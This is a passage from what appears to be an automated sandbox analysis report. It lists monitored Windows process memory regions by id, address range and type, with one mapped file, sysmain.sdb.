entry_point = 0x0 region_type = private name = "private_0x000000000f590000" filename = "" Region: id = 4289 start_va = 0xfdd0000 end_va = 0xff72fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fdd0000" filename = "" Region: id = 4290 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 4291 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 4292 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4293 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4294 start_va = 0xf3f0000 end_va = 0xf59cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3f0000" filename = "" Region: id = 4295 start_va = 0xf5a0000 end_va = 0xf74dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f5a0000" filename = "" Region: id = 4296 start_va = 0xf3f0000 end_va = 0xf59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3f0000" filename = "" Region: id = 4297 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 4298 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 4299 start_va = 0xfdd0000 end_va = 0xff80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fdd0000" filename = "" Region: id = 4300 start_va = 0xf3f0000 end_va = 0xf5a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3f0000" filename = "" Region: id = 4301 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4302 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4303 start_va = 0xfdd0000 end_va = 0xff82fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fdd0000" filename = "" Region: id = 4304 start_va = 0xf3f0000 end_va = 0xf5abfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3f0000" filename = "" Region: id = 4305 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 4306 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 4307 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4308 start_va = 0xfdd0000 end_va = 0xff88fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fdd0000" filename = "" Region: id = 4309 start_va = 0xf3f0000 end_va = 0xf5a8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3f0000" filename = "" Region: id = 4310 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4311 start_va = 0x4d0000 end_va = 0x4d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 4312 start_va = 0xfdd0000 end_va = 0xff88fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fdd0000" filename = "" Region: id = 4313 start_va = 0xf3f0000 end_va = 0xf5abfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3f0000" filename = "" Region: id = 4314 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 4315 start_va = 0x620000 end_va = 0x63dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 4316 start_va = 0x6f0000 end_va = 0x6fefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 4317 start_va = 0x620000 end_va = 0x62efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 4318 start_va = 0x620000 end_va = 0x62efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 4319 start_va = 0xfdd0000 end_va = 0xff89fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fdd0000" filename = "" Region: id = 4320 start_va = 0xf3f0000 end_va = 0xf5b9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3f0000" filename = "" Region: id = 4321 start_va = 0xfdd0000 end_va = 0xff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fdd0000" filename = "" Region: id = 4322 start_va = 0xf3f0000 end_va = 0xf5befff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3f0000" filename = "" Region: id = 4323 start_va = 0xfdd0000 end_va = 0xff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fdd0000" filename = "" Region: id = 4324 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 4325 start_va = 0x620000 end_va = 0x63dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 4326 start_va = 0x6f0000 end_va = 0x6fefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 4327 start_va = 0x620000 end_va = 0x62efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 4328 start_va = 0x620000 end_va = 0x62efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 4329 start_va = 0xf3f0000 end_va = 0xf5bafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3f0000" filename = "" Region: id = 4330 start_va = 0xfdd0000 end_va = 0xff98fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fdd0000" filename = "" Region: id = 4331 start_va = 0xf3f0000 end_va = 0xf5b2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3f0000" filename = "" Region: id = 4332 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 4333 start_va = 0x620000 end_va = 0x63dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 4334 start_va = 0x6f0000 end_va = 0x6fefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 4335 start_va = 0x620000 end_va = 0x62efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 4336 start_va = 0x620000 end_va = 0x62efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 4337 start_va = 0x630000 end_va = 0x636fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 4338 start_va = 0x7df5ffe40000 end_va = 0x7df5ffebdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\apppatch64\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\apppatch64\\sysmain.sdb") Region: id = 4349 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 4350 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 4351 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4352 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4353 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 4354 start_va = 0x2900000 end_va = 0x291ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 4355 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4356 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4357 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4358 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 4359 start_va = 0x2900000 end_va = 0x291ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 4360 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4361 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4370 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 4371 start_va = 0x2900000 end_va = 0x291ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 4372 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4373 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4374 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 4393 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4394 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4395 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4396 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4397 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4398 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4399 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4400 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4401 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4402 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4403 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4404 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4405 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4406 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4407 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4408 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4409 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4410 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4411 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4412 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4413 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4414 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4415 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4416 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4417 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4418 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4419 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4420 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4421 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4422 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4423 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4424 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4425 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4426 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4427 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4428 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4429 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4430 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4431 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4432 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4433 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4434 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4435 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4436 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4437 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4438 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4439 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4440 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4441 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4442 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4443 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4444 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4445 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4446 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4447 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4448 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4449 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4450 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4451 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4452 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4453 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4454 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4455 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4456 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4457 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4458 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4464 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4465 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4466 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4467 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4477 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4478 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4479 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4480 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4486 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4487 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4488 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4489 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4500 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4501 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4502 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4503 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4504 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4505 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4506 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4507 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4508 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4509 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4510 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4511 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4512 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4513 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4514 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4515 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4516 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4517 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4518 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4519 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4520 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4521 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4522 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4523 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4524 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4525 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4526 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4527 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4529 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4530 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4531 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4532 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4533 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4534 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4535 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4536 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4537 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4538 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4539 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4540 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4541 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4542 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4543 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4544 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4545 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4546 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4547 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4548 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4549 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4550 start_va = 0x460000 end_va = 